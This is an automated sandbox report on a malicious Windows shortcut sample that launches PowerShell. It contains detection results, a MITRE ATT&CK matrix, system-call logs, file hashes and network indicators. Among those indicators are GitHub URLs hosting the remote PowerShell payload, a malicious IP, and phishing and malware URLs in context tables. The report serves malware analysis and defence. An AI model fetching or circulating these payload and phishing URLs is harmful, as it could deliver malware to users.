Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
DLL Side-Loading		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		21
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Standard Port		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive1
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeylogging13
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials111
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
zpbiw0htk6.lnk26%ReversingLabsShortcut.Trojan.Boxter
zpbiw0htk6.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
raw.githubusercontent.com
185.199.110.133
truefalse
    		high
    raw.github.com
    		185.199.110.133
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://raw.github.com/k53xupn43/i965652f/refs/heads/main/m.ps1false
        		high
        https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1false
          		high

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          157.245.101.141
          		unknownUnited States
          		14061DIGITALOCEAN-ASNUStrue
          185.199.110.133
          		raw.githubusercontent.comNetherlands
          		54113FASTLYUSfalse

          General Information

          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1574452
          Start date and time:2024-12-13 10:37:18 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 4s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:6
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Sample name:zpbiw0htk6.lnk
          renamed because original name is a hash value
          Original Sample Name:47f951195d9b1939db1c0269f6fcd3d9446b323bd5302c17e71576ebb040f6df.lnk
          Detection:MAL
          Classification:mal96.evad.winLNK@4/7@2/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .lnk
          • Override analysis time to 240s for powershell

          Warnings

          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size getting too big, too many NtCreateKey calls found.
          • Report size getting too big, too many NtQueryAttributesFile calls found.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • VT rate limit hit for: zpbiw0htk6.lnk

          Simulations

          Behavior and APIs

          TimeTypeDescription
          04:38:15API Interceptor14572852x Sleep call for process: powershell.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          185.199.110.133sys_upd.ps1Get hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          cr_asm_menu..ps1Get hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          cr_asm_phshop..ps1Get hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
          SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
          • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_mnr.txt

          Domains

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          raw.github.comhttps://www.mycimalive.com/Get hashmaliciousUnknownBrowse
          • 185.199.108.133
          Vistumbler_v10-8-2.exeGet hashmaliciousUnknownBrowse
          • 185.199.111.133
          raw.githubusercontent.comfile.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
          • 185.199.111.133
          WXahq3ZEss.lnkGet hashmaliciousDucktailBrowse
          • 185.199.108.133
          https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
          • 185.199.109.133
          iboka6.htaGet hashmaliciousUnknownBrowse
          • 185.199.109.133
          Downloader.htaGet hashmaliciousUnknownBrowse
          • 185.199.109.133
          dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
          • 185.199.109.133
          interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
          • 185.199.109.133
          run.cmdGet hashmaliciousUnknownBrowse
          • 185.199.109.133
          PYsje7DgYO.exeGet hashmaliciousRHADAMANTHYSBrowse
          • 185.199.109.133
          EcjH6Dq36Y.exeGet hashmaliciousRHADAMANTHYSBrowse
          • 185.199.108.133

          ASNs

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          DIGITALOCEAN-ASNUSchos.exeGet hashmaliciousUnknownBrowse
          • 159.89.102.253
          http://18.224.21.137/FFmnpShhHMMWeIqsVa2rJ69xinQlZ-7450Get hashmaliciousUnknownBrowse
          • 167.99.100.230
          CMR ART009.docxGet hashmaliciousUnknownBrowse
          • 138.68.185.118
          CMR ART009.docxGet hashmaliciousUnknownBrowse
          • 138.68.185.118
          loligang.sh4.elfGet hashmaliciousMiraiBrowse
          • 64.227.13.234
          loligang.x86.elfGet hashmaliciousMiraiBrowse
          • 46.101.82.113
          https://google.co.ve/url?6q=emgjbxlJLi6z73yh&rct=tTPvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s%2fsoftilac.com.tr%2f7yoya/jiehcuo2ndtn1/ZHRob3JuZUBpa2FzZ3JvdXAuY29t%C3%A3%E2%82%AC%E2%80%9A$$$%C3%A3%E2%82%AC%E2%80%9AGet hashmaliciousHTMLPhisherBrowse
          • 68.183.219.51
          2.elfGet hashmaliciousUnknownBrowse
          • 157.245.133.80
          http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
          • 174.138.125.138
          http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
          • 174.138.125.138
          FASTLYUSfile.exeGet hashmaliciousCredential FlusherBrowse
          • 151.101.65.91
          file.exeGet hashmaliciousCredential FlusherBrowse
          • 151.101.1.91
          https://tanvu4275q8.wixsite.com/so/8cPEz8Djt/c?w=bJAUesZ8eZ2xWNc0NTHHsU2Nmh3l2WncU6sGxbkep9U.eyJ1IjoiaHR0cHM6Ly9mc2RqZmllZmlqcy5zaXRlLyIsInIiOiI0ODEzNDVjNy1iNDE0LTQwZDAtYjVlOS02NTQxMmJkNjgzMjAiLCJtIjoibWFpbCIsImMiOiJjYmUwODBjMy03ZjVkLTQxMDctOWFhMC05NGMxMmQzNGZhMGEifQGet hashmaliciousUnknownBrowse
          • 151.101.66.137
          Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
          • 151.101.0.223
          file.exeGet hashmaliciousCredential FlusherBrowse
          • 151.101.129.91
          file.exeGet hashmaliciousCredential FlusherBrowse
          • 151.101.65.91
          secure.htmGet hashmaliciousHTMLPhisherBrowse
          • 185.199.110.153
          archive.htmGet hashmaliciousHTMLPhisherBrowse
          • 185.199.111.153
          in.exeGet hashmaliciousBabadeda, HTMLPhisherBrowse
          • 185.199.108.153
          Pl8Tb06C8A.exeGet hashmaliciousCredential FlusherBrowse
          • 151.101.65.91

          JA3 Fingerprints

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          3b5074b1b5d032e5620f69f9f700ff0eUniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
          • 185.199.110.133
          Kopia%20p%C5%82atno%C5%9Bci_Santander_TF1903218545300000564290004.exeGet hashmaliciousUnknownBrowse
          • 185.199.110.133
          Kopia%20p%C5%82atno%C5%9Bci_Santander_TF1903218545300000564290004.exeGet hashmaliciousUnknownBrowse
          • 185.199.110.133
          archive.htmGet hashmaliciousHTMLPhisherBrowse
          • 185.199.110.133
          2024_12_12_Aster_Oak_Babywear_Advertising_Project_Shopify.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
          • 185.199.110.133
          3181425fa7464801a03868a1adf86bc1.ps1Get hashmaliciousUnknownBrowse
          • 185.199.110.133
          in.exeGet hashmaliciousBabadeda, HTMLPhisherBrowse
          • 185.199.110.133
          WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
          • 185.199.110.133
          ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
          • 185.199.110.133
          eCXXUk54sx.exeGet hashmaliciousDivulge StealerBrowse
          • 185.199.110.133

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):61147
          Entropy (8bit):5.078086286400755
          Encrypted:false
          SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHBqdIJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPE
          MD5:96F9023163A6C17B352680E896DEA496
          SHA1:DD5EC72232854F5F14C41AFA756274139EBF4FCF
          SHA-256:A0D599D68CBF5FFC3B9B299967A6B8CCA4BE9B5F3E91EC70C50CBA413D0F2071
          SHA-512:CF42E8BD1F0ECA8E76D2FB6C7A0132B608D278893C067707FB0B912E1D47C7525E2D92D65EBD599D25453D1A5CF448364026B60133262C4662FDDC4EA6B1B6A2
          Malicious:false
          Reputation:low
          Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ooyhy4e.ztp.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vbx5evf.ueu.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5cjlug1o.5ld.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dyhfli0y.w4v.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XYJ5ZUX9PYQQ8MQVSA3Z.temp

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):5339
          Entropy (8bit):3.420746901605303
          Encrypted:false
          SSDEEP:48:tR9G/RjuYIbLOZdbNlHJWSogZos355dbNlLWSogZos3d1:tiVuY+LadbNDHb3ndbNxHb37
          MD5:241BD0C72759F470F02F2EB8AB78B258
          SHA1:09956C6E9F807E29E9E8A210AA9F13E8786E5EB8
          SHA-256:EC8CF3EBBBB796CCF2984EBE76127FFCE93BFB603A29BDA67E3B806C25A715E0
          SHA-512:FEB1266CBD7C8B2D6C25F904F4F3E6A94F25B46C47E8B7B498B5FB99587CE24EF1374E2E22E8922EC9CD0A2FD7A40597E83DBF2780BC36721467FA371B61648A
          Malicious:false
          Preview:...................................FL..................F.`.. ......W.......BM...Z..BM...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S...J6N.W.......BM....j.2......Y.L .ZPBIW0~1.LNK..N......EW.5.Y.L..........................5.!.z.p.b.i.w.0.h.t.k.6...l.n.k.......W...............-.......V...................C:\Users\user\Desktop\zpbiw0htk6.lnk....C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.n.o.t.e.p.a.d...e.x.e.........%SystemRoot%\System32\notepad.exe...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.n.o.t.e.p.a.d...e.x.e........................................................................................................................................................................................................................

          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\a887f89dbadc4419.customDestinations-ms (copy)

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):5339
          Entropy (8bit):3.420746901605303
          Encrypted:false
